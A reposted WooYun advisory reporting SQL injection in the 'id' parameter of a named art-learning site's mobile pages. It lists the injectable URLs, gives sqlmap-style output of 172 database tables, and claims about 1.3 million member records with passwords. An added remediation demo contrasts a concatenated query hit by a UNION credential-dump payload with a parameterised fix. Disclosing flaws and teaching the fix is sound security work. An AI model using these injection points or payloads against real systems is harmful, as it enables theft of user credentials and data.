Yiihuu.com: multiple SQL injections exposing about 1.3 million member records, passwords included

admin, 2017-04-25 09:21:00
Summary

2016-03-04: Details sent to the vendor; awaiting vendor handling
2016-03-04: Vendor has confirmed; details visible to the vendor only
2016-03-14: Details opened to core white hats and relevant domain experts
2016-03-24: Details opened to regular white hats
2016-04-03: Details opened to intern white hats
2016-04-18: Details opened to the public

Vulnerability overview

Defect ID: WooYun-2016-172945

Title: Yiihuu.com: multiple SQL injections exposing about 1.3 million member records, passwords included

Vendor: yiihuu.com

Author: 头晕脑壳疼

Submitted: 2016-03-04 11:55

Published: 2016-04-18 12:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor has confirmed

Source: www.wooyun.org. If you have questions or need help, please get in touch.

Tags: none



Vulnerability details


Brief description:

Yiihuu.com is an online art-learning platform built around video on demand, and describes itself as the first of its kind worldwide. It currently covers a range of image-processing software, the content is highly practical, and it bills itself as the leading digital-art learning community.

Detailed description:

Injection point 1 (the `*` is sqlmap's marker for the injection point in the `id` parameter; the enumeration output below is in sqlmap's format)

http://m.yiihuu.com/bc/detail.php?id=32*&f=h

[screenshot]

Injection point 2 (the `id` parameter again)

http://m.yiihuu.com/bc/detail.php?id=34

[screenshot]

7 databases

[screenshot]

172 tables

Database: yiihuu_db
[172 tables]
+-------------------------+
| 360_token |
| activity |
| admin |
| advertisement |
| album |
| album_chapter |
| album_copy |
| album_copy_chapter |
| album_count |
| album_extend |
| album_project |
| album_rank_month |
| album_rank_week |
| album_video |
| ask |
| ask_answer |
| ask_content |
| ask_zan |
| attention |
| baidu_push |
| book |
| book_art_tag |
| book_article |
| book_article_ext |
| book_article_temp |
| book_tag |
| business_course |
| business_order |
| card_study |
| chips |
| chips_courses |
| comment |
| comment_att |
| comment_content |
| comment_goodlog |
| comment_reply |
| courses |
| courses_attachment |
| courses_count |
| courses_extend |
| courses_homework |
| courses_homework_attr |
| courses_homework_topic |
| courses_info |
| courses_learn_progress |
| courses_live |
| courses_live_need |
| courses_manage_progress |
| courses_notice |
| courses_payback |
| courses_plan |
| courses_progress |
| courses_push |
| courses_qa |
| courses_qa_fav |
| courses_repay |
| courses_section |
| courses_step |
| courses_step_homework |
| courses_student_test |
| courses_student_work |
| courses_task |
| courses_task_comp |
| courses_test_ext |
| courses_video |
| courses_video_attr |
| coursesapply |
| courseslist |
| download |
| download_class |
| download_count |
| download_ext |
| download_log |
| edu_apply |
| email_count |
| error_reason |
| event_0410 |
| event_0421 |
| event_0509 |
| event_bless |
| event_cj |
| event_gift |
| event_gift_list |
| event_jyj |
| event_jyj_ly |
| event_lhb |
| event_lhb_extend |
| event_org |
| event_org_votelist |
| event_prize |
| event_school_msg |
| event_tejia |
| event_vip_wjdc |
| event_wx_hubi |
| event_wx_lhb |
| event_wx_menucount |
| exp_get |
| exp_op |
| fanc |
| favorites |
| filter_keyword |
| help |
| image_content |
| image_count |
| index_show |
| mail_auth |
| mail_notify |
| member |
| member_bind |
| member_bind_token |
| member_extend |
| member_filter |
| member_log |
| member_login_record |
| member_message |
| member_other |
| message |
| message_push |
| meta_custom |
| news |
| news_class |
| news_ext |
| push_action |
| push_content |
| push_msg_qq |
| quan |
| quan_ext |
| say |
| say_content |
| say_count |
| say_log |
| search_syn |
| search_word |
| send_mail |
| share |
| sign |
| sign_extend |
| sort_exp |
| sort_level |
| sort_log |
| sort_theme |
| sort_theme_2 |
| sort_tool |
| sort_tool_industry |
| space_focusimg |
| space_friendlink |
| space_group |
| space_member_info |
| space_org_news |
| space_view |
| study |
| subject |
| subject_column |
| subject_soft_content |
| subscribe |
| sys_message |
| task |
| task_member |
| task_verify_ip |
| tbl_session |
| video |
| video_bigpic |
| video_content |
| video_count |
| words |
| words_rank_month |
| words_rank_week |
| wordsset |
| wordsset_count |
| wordsset_extend |
| wordsset_list |
| wx_keyword |
+-------------------------+

Roughly 1.3 million member records

[screenshot]

One account verified:

[screenshot]

Proof of vulnerability:

Injection point 1

http://m.yiihuu.com/bc/detail.php?id=32*&f=h

[screenshot]

Injection point 2

http://m.yiihuu.com/bc/detail.php?id=34

[screenshot]

7 databases; 172 tables in yiihuu_db (same listing as in the detailed description); roughly 1.3 million member records; one account verified.

[screenshots]

Remediation:
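The report leaves this section empty. The following is an added example, not code from the report or from yiihuu.com, showing the bug class behind a lookup such as detail.php?id=32: the same query written once with string concatenation (where a value like `32 UNION ALL SELECT username, password FROM member` turns a lesson lookup into a credential dump) and once with input validation plus a bound parameter. It runs against a constructed in-memory SQLite database; the `detail` table, the `username`/`password` columns and every row are constructed for the demo, and only the table name `member` and the `id` parameter come from the report.

```python
# Added example (not from the WooYun report or yiihuu.com): a detail.php-style
# lookup in its vulnerable and its parameterised form, run against a
# constructed in-memory SQLite database.
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE detail (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE member (uid INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO detail VALUES (32, 'Lesson 32', 'public lesson text');
        INSERT INTO detail VALUES (34, 'Lesson 34', 'another public lesson');
        -- constructed credentials: unsalted MD5 of 'password' and of '123456'
        INSERT INTO member VALUES (1, 'alice', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO member VALUES (2, 'bob',   'e10adc3949ba59abbe56e057f20f883e');
        """
    )
    return conn


def detail_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    """Vulnerable form: the raw query-string value is spliced into the SQL
    text, so the caller controls the statement, not just the compared value.
    A two-column SELECT lets a UNION pull any two columns of any table."""
    sql = "SELECT title, body FROM detail WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def detail_parameterised(conn: sqlite3.Connection, id_param: str) -> list:
    """Hardened form: reject anything that is not a plain non-negative integer,
    then bind the value as a parameter so the engine receives it as data."""
    if not id_param.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute(
        "SELECT title, body FROM detail WHERE id = ?", (int(id_param),)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    payload = "32 UNION ALL SELECT username, password FROM member"
    print("vulnerable:", detail_vulnerable(db, payload))   # lesson row + 2 credential rows
    print("hardened  :", detail_parameterised(db, "32"))  # lesson row only
    try:
        detail_parameterised(db, payload)
    except ValueError as exc:
        print("hardened  :", exc)                         # payload rejected
```

In PHP, the hardened form corresponds to casting `$_GET['id']` to an integer (or validating it) and using a PDO or mysqli prepared statement with a bound parameter instead of interpolating the value into the query string. The dump also shows why storage matters as a second line of defence: if the `member` table holds unsalted hashes, a dump of this kind is immediately usable against the accounts, whereas salted, slow hashes limit what an injection like this yields.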

Copyright notice: when reprinting, please credit 头晕脑壳疼@乌云 (WooYun).


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2016-03-04 12:08

Vendor reply:

This is indeed a serious vulnerability.

Latest status:

None



